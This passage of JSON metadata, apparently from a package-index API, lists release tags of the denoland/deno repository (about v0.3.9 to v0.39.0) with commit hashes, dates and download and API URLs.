sts"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/h